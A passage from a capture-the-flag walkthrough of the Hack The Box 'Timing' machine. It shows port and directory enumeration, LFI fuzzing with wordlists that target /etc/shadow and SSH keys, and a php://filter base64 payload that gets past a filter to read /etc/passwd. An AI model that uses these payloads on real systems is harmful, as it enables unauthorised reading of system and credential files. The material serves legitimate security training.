Hack-The-Box-walkthrough[timing]

Posted on Edited on In Views: Word count in article: 8.7k Reading time ≈ 31 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 11 Dec 2021
IP: 10.10.11.135

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.135
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap reveals two open ports, HTTP and SSH. Let’s look into webpage.

Just a login page, there’s nothing else on the homepage. Let’s do a directory brute force.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# gobuster dir -u http://timing.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://timing.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/18 08:46:39 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/images               (Status: 301) [Size: 309] [--> http://timing.htb/images/]
/.html.php            (Status: 403) [Size: 275]                                
/.php                 (Status: 403) [Size: 275]                                
/login.php            (Status: 200) [Size: 5609]                               
/index.php            (Status: 302) [Size: 0] [--> ./login.php]                
/js                   (Status: 301) [Size: 305] [--> http://timing.htb/js/]    
/css                  (Status: 301) [Size: 306] [--> http://timing.htb/css/]   
/.htm.php             (Status: 403) [Size: 275]                                
/.htm                 (Status: 403) [Size: 275]                                
/profile.php          (Status: 302) [Size: 0] [--> ./login.php]                
/logout.php           (Status: 302) [Size: 0] [--> ./login.php]                
/image.php            (Status: 200) [Size: 0]                                  
/upload.php           (Status: 302) [Size: 0] [--> ./login.php]                
/header.php           (Status: 302) [Size: 0] [--> ./login.php]                
/footer.php           (Status: 200) [Size: 3937]                               
/.                    (Status: 302) [Size: 0] [--> ./login.php]

We got couple of directories and php files. If we look closer, most php files are redirecting to ‘login.php’. However, image.php is not redirecting to anywhere, and also the size is ‘0’. Initially I was little bit confused, why there’s a ‘image.php’ and ‘images’ directory, both server the same purpose. So, I did a directory brute force on ‘images’.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# gobuster dir -u http://timing.htb/images/ -x php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://timing.htb/images/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/18 08:50:11 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.html.php            (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/.htm                 (Status: 403) [Size: 275]
/.htm.php             (Status: 403) [Size: 275]
/uploads              (Status: 301) [Size: 317] [--> http://timing.htb/images/uploads/]

There’s another directory inside ‘images’. So, my speculation was, if user uploads any images via ‘upload.php’ it dumps it in ‘/images/upload’ directory and it can be accessed via ‘image.php’. I tried to fuzz with file parameter for any LFI or Path traversal attack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root💀kali)-[~/ffuf]
└─# ./ffuf -u 'http://timing.htb/image.php?file=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://timing.htb/image.php?file=FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/etc/httpd/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/lilo.conf          [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/exports            [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/shadow             [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/anacrontab         [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/groups             [Status: 200, Size: 0, Words: 1, Lines: 1]
......

As you can see, status code of files are 200 but size is 0. It simply means, ‘file’ parameter is not working. I tried with couple other parameters but all failed, but ‘img’ parameter worked.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
┌──(root💀kali)-[~/ffuf]
└─# ./ffuf -u 'http://timing.htb/image.php?img=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://timing.htb/image.php?img=FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/etc/lighttpd.conf      [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/passwd             [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/shadow             [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ftpaccess          [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/inetd.conf         [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/hosts.deny         [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/httpd.conf   [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/hosts              [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/php.ini      [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/issue              [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ftphosts           [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/exports            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/chrootUsers        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/chttp.conf         [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/cups/cupsd.conf    [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/crontab            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/aliases            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/groups             [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/at.deny            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/cron.allow         [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/apache2/apache2.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/fstab              [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/conf/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/at.allow           [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/inittab            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/bootptab           [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/hosts.allow        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/cron.deny          [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/logrotate.d/proftpd [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/logrotate.d/vsftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/motd               [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/lsb-release        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/mtab               [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/my.cnf             [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/my.conf            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/mysql/my.cnf       [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/networks           [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/network/interfaces [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/passwd             [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php5/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/proftp.conf        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ftpchroot          [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/srm.conf     [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pureftpd.pdb       [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd/pure-ftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd/putreftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/resolv.conf        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/samba/smb.conf     [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_config     [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/anacrontab         [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_dsa_key [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_dsa_key.pub [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/syslog.conf        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/termcap            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vsftpd.chroot_list [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/lilo.conf          [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/apache2/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vsftpd.conf        [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/logrotate.d/ftp    [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/motd               [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/wu-ftpd/ftpaccess  [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4.4/fcgi/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/wu-ftpd/ftphosts   [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/wu-ftpd/ftpusers   [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/cgi/php.ini    [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/apache/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/logs/pure-ftpd.log     [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/npasswd            [Status: 200, Size: 25, Words: 3, Lines: 1]
/logs/security_debug_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/logs/security_log      [Status: 200, Size: 25, Words: 3, Lines: 1]
/opt/lampp/etc/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/interrupts        [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/cpuinfo           [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/filesystems       [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pureftpd.passwd    [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/meminfo           [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/ioports           [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/cgi/php.ini   [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php5/apache/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/apache/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/snmpd.conf         [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/mounts            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php.ini            [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/version           [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/self/net/arp      [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/stat              [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/sshd_config    [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/lib/php.ini        [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/lib/php/php.ini    [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/php.ini        [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/conf/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/log   [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_key.pub [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/logs  [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/printcap           [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/profile            [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/sysconfig/network  [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/audit_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/access.conf  [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/redhat-release     [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs  [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vsftpd/vsftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/license_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_key   [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/httpd/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/login_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/stats_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/grub.conf          [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/bashrc             [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vhcs2/proftpd/proftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/lib/php.ini  [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php4/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php4/httpd.conf.php [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php5/httpd.conf.php [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php5/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php/httpd.conf.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/pureftpd/etc/pureftpd.pdn [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/www/logs/httpd_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/modules.conf       [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/sbin/pure-config.pl [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/adm/log/xferlog    [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/apache2/config.inc [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/lib/mysql/my.cnf   [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/apache/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/apache/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/local/www/conf/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/lib/mysql/mysql/user.MYD [Status: 200, Size: 25, Words: 3, Lines: 1]
/opt/xampp/etc/php.ini  [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/modules           [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/php4/php.ini   [Status: 200, Size: 25, Words: 3, Lines: 1]
/root/anaconda-ks.cfg   [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd.conf     [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/proftpd/proftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/swaps             [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache-ssl/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache-ssl/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/auth.log       [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/boot           [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/htmp               [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/chttp.log      [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/conf/modsec.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/cups/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/daemon.log     [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/dmesg          [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/dpkg.log       [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim/mainlog   [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim_mainlog   [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim_paniclog  [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/httpd/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim.paniclog  [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/pureftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/php.ini  [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/logs/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim_rejectlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim/rejectlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/faillog        [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/ftplog         [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/ftp-proxy      [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/ftp-proxy/ftp-proxy.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpsd/ssl.access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/kern.log       [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpsd/ssl_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lastlog        [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/lighttpd.access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/lighttpd.error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mail.log       [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/maillog        [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mail.warn      [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/message        [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysqlderror.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/messages       [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql/mysql-bin.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php5/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php4/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/secure         [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/vsftpd.log     [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/pure-ftpd/pure-ftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/cpanel/cpanel.config [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/pureftpd/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/wtmp           [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/xferlog        [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/Zend/etc/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/pureftpd/sbin/pure-config.pl [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/mysql.log          [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/spool/cron/crontabs/root [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/webmin/miniserv.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/run/utmp           [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/log/error_log  [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/log/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
~/.atfp_history         [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bash_history         [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bash_logout          [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bash_profile         [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.login                [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bashrc               [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.gtkrc                [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.logout               [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.php_history          [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.mysql_history        [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.nano_history         [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.profile              [Status: 200, Size: 0, Words: 1, Lines: 1]
/var/log/debug          [Status: 200, Size: 25, Words: 3, Lines: 1]
~/.ssh/id_dsa.pub       [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/id_dsa           [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/authorized_keys  [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/id_rsa           [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/id_rsa.pub       [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/identity         [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/identity.pub     [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.viminfo              [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.wm_style             [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.Xdefaults            [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.Xresources           [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.xsession             [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.xinitrc              [Status: 200, Size: 0, Words: 1, Lines: 1]
/var/log/mail.info      [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql/mysql-slow.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/pureftpd.log   [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/yum.log        [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/proftpd        [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql.log      [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql/mysql.log [Status: 200, Size: 25, Words: 3, Lines: 1]
:: Progress: [257/257] :: Job [1/1] :: 42 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

We got 200 status code and size of all file same.

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=/etc/passwd'
Hacking attempt detected!

As you can see, I tried to curl the path with ‘img’ parameter, and I got the above response. We need to bypass the security filters now.

  • Wrapper php://filter

We will use:

1
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

this php filter to bypass the filter and read the files. It gives output in base64 encoded format, so we need to decode it to understand.

We got the encoded information, let’s decode it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2152  100  2152    0     0   2744      0 --:--:-- --:--:-- --:--:--  2741
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
